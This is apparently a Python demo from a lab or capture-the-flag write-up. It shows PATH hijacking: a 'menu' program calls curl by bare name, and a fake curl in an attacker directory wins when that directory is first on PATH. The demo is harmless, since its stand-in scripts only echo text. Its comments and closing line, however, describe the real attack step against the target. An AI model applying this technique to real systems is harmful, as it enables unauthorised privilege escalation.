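def run_with_path(script, path):
    """Run script with PATH set to `path` only and return its stdout (stripped)."""
    done = subprocess.run([script], env={"PATH": path}, capture_output=True, text=True, timeout=10)
    return done.stdout.strip()

def hijack_demo():
    """What 'menu' option 1 (curl -I localhost) ends up executing when the attacker's
    directory is first on PATH versus last. Constructed stand-ins, no set-uid involved."""
    with tempfile.TemporaryDirectory() as top:
        system_bin = os.path.join(top, "usr_bin")      # stand-in for /usr/bin
        attacker = os.path.join(top, "tmp")            # stand-in for /tmp
        os.mkdir(system_bin)
        os.mkdir(attacker)
        make_script(system_bin, "curl", 'echo "legit curl $*"')
        menu = make_script(system_bin, "menu", "curl -I localhost")   # bare name, as strings showed
        make_script(attacker, "curl", "echo hijacked")
        first = f"{attacker}:{system_bin}"             # export PATH=/tmp:$PATH
        last = f"{system_bin}:{attacker}"              # export PATH=$PATH:/tmp
        return {
            "prepended": run_with_path(menu, first),
            "appended": run_with_path(menu, last),
            "which_prepended": os.path.relpath(shutil.which("curl", path=first), top),
            "which_appended": os.path.relpath(shutil.which("curl", path=last), top),
        }

if __name__ == "__main__":
    for key, value in hijack_demo().items():
        print(f"{key:16} {value}")
```

The env passed to the child contains only PATH, so the outcome depends on nothing but the order of the two directories; that is also why, on the real target, exporting PATH in the same shell that then runs menu is enough.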
